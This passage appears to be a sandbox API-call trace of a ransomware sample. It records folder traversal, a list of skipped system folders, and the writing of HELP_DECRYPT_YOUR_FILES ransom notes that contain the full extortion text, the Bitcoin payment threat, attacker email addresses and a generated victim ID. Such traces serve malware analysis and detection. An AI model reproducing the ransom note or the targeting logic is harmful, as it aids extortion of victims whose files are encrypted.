	[0170.023] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7edbcf55, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7edbcf55, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7edbcf55, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0170.023] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0170.023] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0170.025] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Server", cAlternateFileName="")) returned 0
	[0170.035] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0170.035] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0170.036] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x781b3cb1, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x781b3cb1, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x781b3cb1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0170.036] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7818d799, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7818d799, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x781b3cb1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0170.036] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IdentityCRL", cAlternateFileName="IDENTI~1")) returned 1
	[0170.036] lstrcmpW (lpString1="IdentityCRL", lpString2="..") returned 1
	[0170.036] lstrcmpW (lpString1="IdentityCRL", lpString2=".") returned 1
	[0170.036] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0170.037] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\") returned="C:\\Users\\All Users\\Microsoft\\"
	[0170.037] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\", lpString2="IdentityCRL" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL"
	[0170.037] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\IdentityCRL" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL"
	[0170.037] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\"
	[0170.037] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\"
	[0170.037] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*"
	[0170.037] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0170.038] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*") returned 44
	[0170.038] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0170.038] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*", cchLength=0x2c | out: lpsz="c:\\users\\all users\\microsoft\\identitycrl\\*.*") returned 0x2c
	[0170.038] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.039] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="windows") returned 0x0
	[0170.039] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.039] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="boot") returned 0x0
	[0170.039] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.039] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="system volume information") returned 0x0
	[0170.039] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.040] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0170.040] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.040] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="temp") returned 0x0
	[0170.040] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.040] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="program files") returned 0x0
	[0170.041] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.041] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="program files (x86)") returned 0x0
	[0170.042] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.042] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="appdata") returned 0x0
	[0170.042] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.042] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="application data") returned 0x0
	[0170.042] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.042] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="winnt") returned 0x0
	[0170.043] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.043] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="tmp") returned 0x0
	[0170.043] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.043] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="cache") returned 0x0
	[0170.043] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.043] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="temporary internet files") returned 0x0
	[0170.044] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.044] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="webcache") returned 0x0
	[0170.044] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.044] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="inetcache") returned 0x0
	[0170.044] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.044] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="nvidia") returned 0x0
	[0170.045] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.045] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="packages") returned 0x0
	[0170.045] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.045] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="cookies") returned 0x0
	[0170.045] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.045] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="programdata") returned 0x0
	[0170.045] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0170.046] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35da50f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x35da50f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="INT", cAlternateFileName="")) returned 1
	[0170.046] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5b9d2ab4, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5b9d2ab4, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="production", cAlternateFileName="PRODUC~1")) returned 1
	[0170.046] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5b9d2ab4, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5b9d2ab4, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="production", cAlternateFileName="PRODUC~1")) returned 0
	[0170.046] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0170.046] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0170.047] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\IdentityCRL" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL"
	[0170.047] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*"
	[0170.047] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0170.047] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0170.048] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\HELP_DECRYPT_YOUR_FILES.TXT") returned 68
	[0170.048] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0170.048] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0170.048] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0170.052] CloseHandle (hObject=0x384) returned 1
	[0170.052] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0170.053] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0170.053] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0170.054] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0170.054] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0170.055] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0170.055] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0170.055] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0170.055] CloseHandle (hObject=0x384) returned 1
	[0170.057] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0170.058] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0170.058] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0170.058] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\HELP_DECRYPT_YOUR_FILES.HTML") returned 69
	[0170.058] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0170.064] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0170.064] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0170.067] CloseHandle (hObject=0x384) returned 1
	[0170.068] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0170.068] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0170.068] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0170.069] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0170.070] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0170.070] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0170.070] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0170.070] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0170.071] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0170.071] CloseHandle (hObject=0x384) returned 1
	[0170.071] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7ee55a9c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0170.072] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*") returned 44
	[0170.072] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0170.073] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*", cchLength=0x2c | out: lpsz="c:\\users\\all users\\microsoft\\identitycrl\\*.*") returned 0x2c
	[0170.073] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.073] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="windows") returned 0x0
	[0170.073] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.073] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="boot") returned 0x0
	[0170.073] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.074] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="system volume information") returned 0x0
	[0170.074] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.074] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0170.074] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.074] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="temp") returned 0x0
	[0170.074] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.075] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="program files") returned 0x0
	[0170.075] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.075] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="program files (x86)") returned 0x0
	[0170.075] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.075] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="appdata") returned 0x0
	[0170.075] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.075] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="application data") returned 0x0
	[0170.076] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.076] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="winnt") returned 0x0
	[0170.076] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.076] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="tmp") returned 0x0
	[0170.076] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.076] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="cache") returned 0x0
	[0170.076] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.077] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="temporary internet files") returned 0x0
	[0170.077] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.077] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="webcache") returned 0x0
	[0170.077] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.077] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="inetcache") returned 0x0
	[0170.077] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.078] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="nvidia") returned 0x0
	[0170.078] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.078] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="packages") returned 0x0
	[0170.078] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.078] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="cookies") returned 0x0
	[0170.078] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.079] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\*.*", lpSrch="programdata") returned 0x0
	[0170.079] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0170.079] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0170.079] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7ee55a9c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0170.079] lstrcmpW (lpString1="..", lpString2="..") returned 0
